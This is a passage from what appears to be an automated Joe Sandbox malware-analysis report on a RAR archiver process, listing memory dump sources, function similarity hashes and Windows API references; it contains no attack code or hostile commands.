                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                      • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                      • Instruction ID: 210436290e70db0fa437ed2b6e486d49f64cd7bbb50f911181c23904d7df7023
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501E525A196A542EBB48B26A44002972E1EF75FE0F1452F0DF6DC7BD4CF3CE441A700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF69A3F7A7B
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A442AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A447EF3
                                                                                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF69A3F7A8F
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3F7B44: GetStdHandle.KERNEL32(?,?,?,00007FF69A3F7A9E), ref: 00007FF69A3F7B4A
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3F7B44: GetFileType.KERNELBASE(?,?,?,00007FF69A3F7A9E), ref: 00007FF69A3F7B56
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A3F7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF69A3F7A9E), ref: 00007FF69A3F7B69
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A442ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A442AD0
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A442B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A442C1C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
Similarity
• API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
Similarity
• API ID: ErrorFileLastPointer
APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF69A40305D,?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800), ref: 00007FF69A4030F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF69A403119
Similarity
• API ID: AttributesFile
Similarity
• API ID: DirectoryLibraryLoadSystem
Similarity
• API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                      • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                      • Instruction ID: 499bf5fcb7715c24f3b84dce353746fcf775606ad257c72640c1afde8672cdad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E08C60E1964383FF38AFF2A80517432D0EF89F40F1450F0D90DD7292EE2CA4918384
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c7c6451250f1d92b445fd7dccdbfbb717c39f23b8886fb790192c1d858181173
                                                                                                                                                                                                                                      • Instruction ID: 125c06ea0e78536c005cc6ca3606376c190ccd52b48c43026827d40506d69c88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7c6451250f1d92b445fd7dccdbfbb717c39f23b8886fb790192c1d858181173
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE1DE22A0868282FB309E2594543BE77E1EF51F98F0841F5DE4DCB7DADE2DA466C710
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
                                                                                                                                                                                                                                      • Instruction ID: 58e456d1d029c4bba9b7b34f4c4cf97547d96cb2435204d49bbd8569f8ad1818
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7a1d2a60ffdbc43dff3a0632d536e208070f789ed259da07b8fca2f3bbe514d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25512673528BD295E7109F64E8441ED37A8F744F88F58427AEE884B79ADF389062C331
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                                                      • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                      • Instruction ID: b0dd689c7a0c4429a8dacb6d2cfbddf48a7c8da215787db6e4f5761110ac7f4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40419E21A19A5386FBB89F25A85027872E1FF90F40F1454F9DA0ECB6D1DE3CE8858780
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3253501508-0
                                                                                                                                                                                                                                      • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                      • Instruction ID: 4178c20214972e788a597f0e755c4fc082992270277c3235bd4a3e89e4c2a9ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59016D12A2E64285FA20AA17A5002BA76E0EF85B94F4814FDFE8DC736ADE3DD4419304
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                      • Instruction ID: 59f4b18bf7f4adfde4031c158644005bcd6bfc35fb9c0608669e4836163addaf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A014F50A0C68382FA749EA65A4127931D0DF88FE5F1882F0EE2DC72D6ED2CE4414391
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CompareString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1825529933-0
                                                                                                                                                                                                                                      • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                      • Instruction ID: 8ba77264e43ee4869b500a78c7ae2dadae0e2835c97f74510a44fdf518e0a7e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0018665B0C69245EA206F13A40406AF6D1FB99FC0F5D48B5EF9DCBB5ACE3CE0424B04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                      • Instruction ID: 3372efa9105e70237324b196f8ec1f1f1c84c456c70559fa09429ad486354e6c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0A9619082C145DB219B7561452F83790DF16FB5F0843F5DF7C8B2C7CE6CA0849B10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                      • Instruction ID: 6f8fb864644f4bd4f8e92873eb4e0fcf57ce5710a504989759b0f7864c0d02f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F0FE15A4D34246FA746EA1584127532C1DF44FA1F5806F0ED2ED72C1EE9CE49183A4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FindClose.KERNELBASE(00000000,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A404549
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
  • Part of subcall function 00007FF69A4249F4: LoadStringW.USER32 ref: 00007FF69A424A7B
  • Part of subcall function 00007FF69A4249F4: LoadStringW.USER32 ref: 00007FF69A424A94
  • Part of subcall function 00007FF69A42B6D0: Sleep.KERNEL32(?,?,?,?,00007FF69A3FCBED,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A42B730
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF69A406CB0
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: LoadString$Sleepfflushswprintf
• String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
• API String ID: 668332963-4283793440
                                                                                                                                                                                                                                      • Opcode ID: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
                                                                                                                                                                                                                                      • Instruction ID: 8a0d94c2ea206390a6df9b4fcdc1124a32741955c58583e98783c424d6017689
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E522AF22A0C6C285EB70DB20E8511F977E1FF51B44F4450FADA8ECB69ADE6CE605DB00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 00007FF69A3FD4A6
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00007FF69A3FD4B9
